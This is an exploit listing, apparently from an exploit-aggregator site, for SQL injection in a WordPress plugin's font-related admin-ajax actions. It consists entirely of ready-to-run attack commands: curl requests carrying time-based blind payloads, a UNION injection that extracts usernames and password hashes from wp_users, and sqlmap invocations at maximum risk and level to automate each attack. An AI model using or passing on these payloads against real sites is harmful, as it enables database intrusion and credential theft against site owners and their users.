Share 
## https://sploitus.com/exploit?id=WPEX-ID:6939C405-AC62-4144-BD86-944D7B89D0AD
curl -i 'http://example.com/wp-admin/admin-ajax.php?action=get_fonts' \
    --data 'id=1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))hewu)'

... or use the sqlmap command below to automate the attack:

sqlmap -u 'http://example.com/wp-admin/admin-ajax.php?action=get_fonts' \
    --data 'id=1' \
    -p id \
    --risk 3 \
    --level 5 \
    --dbms mysql \
    --batch

---

curl -i 'http://example.com/wp-admin/admin-ajax.php?action=get_tag_fonts' \
    --data 'id=-1 UNION ALL SELECT NULL,NULL,NULL,CONCAT((SELECT user_login from wp_users),CHR(0x3a),(SELECT user_pass from wp_users)),NULL-- -'

... or use the sqlmap command below to automate the attack:

sqlmap -u 'http://example.com/wp-admin/admin-ajax.php?action=get_tag_fonts' \
    --data 'id=1' \
    -p id \
    --risk 3 \
    --level 5 \
    --dbms mysql \
    --batch

---

curl -i 'http://example.com/wp-admin/admin-ajax.php?action=delete_fonts' \
    --data 'font_id=1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))kfTw)'

... or use the sqlmap command below to automate the attack:

sqlmap -u 'http://example.com/wp-admin/admin-ajax.php?action=delete_fonts' \
    --data 'font_id=1' \
    -p font_id \
    --risk 3 \
    --level 5 \
    --dbms mysql \
    --batch